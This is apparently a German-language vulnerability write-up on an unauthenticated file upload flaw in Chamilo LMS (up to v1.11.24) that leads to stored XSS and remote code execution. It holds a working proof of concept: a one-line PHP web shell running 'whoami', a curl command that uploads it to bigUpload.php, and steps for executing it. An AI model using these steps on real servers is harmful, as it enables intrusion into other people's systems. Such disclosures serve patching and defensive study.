
Ein uneingeschränkter Datei-Upload in der Funktion zum Hochladen großer Dateien in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 ermöglicht nicht authentifizierten Angreifern, gespeicherte Cross-Site-Scripting-Angriffe durchzuführen und über das Hochladen einer Web-Shell Remote-Codeausführung zu erlangen.
Uneingeschränkter Datei-Upload in der Big-File-Upload-Funktionalität in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 erlaubt nicht authentifizierten Angreifern, gespeicherte Cross-Site-Scripting-Angriffe durchzuführen und Remote-Codeausführung durch das Hochladen einer Web-Shell zu erlangen.
Die Big-File-Upload-Funktionalität von /main/inc/lib/javascript/bigupload/inc/bigUpload.php erlaubt das Hochladen beliebiger Dateien in das Verzeichnis /main/inc/lib/javascript/bigupload/files innerhalb des Web-Roots.
Falls das Verzeichnis /main/inc/lib/javascript/bigupload/files existiert, können wir eine beliebige Datei wie folgt hochladen:
Erstelle eine schädliche PHP-Datei echo '<?php system("whoami"); ?>' > dollarboysushil.php
.png)
Wir können diese Datei dann mit dem folgenden Befehl hochladen:
`$ curl -F '[email protected]' 'http://<website>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'`
.png)
Wir können überprüfen, ob unsere Datei hochgeladen wurde, indem wir das Verzeichnis /main/inc/lib/javascript/bigupload/files aufrufen.
.png)
Und wir können sie ausführen, indem wir auf die PHP-Datei klicken, was die Ausgabe des Befehls whoami liefert.
.png)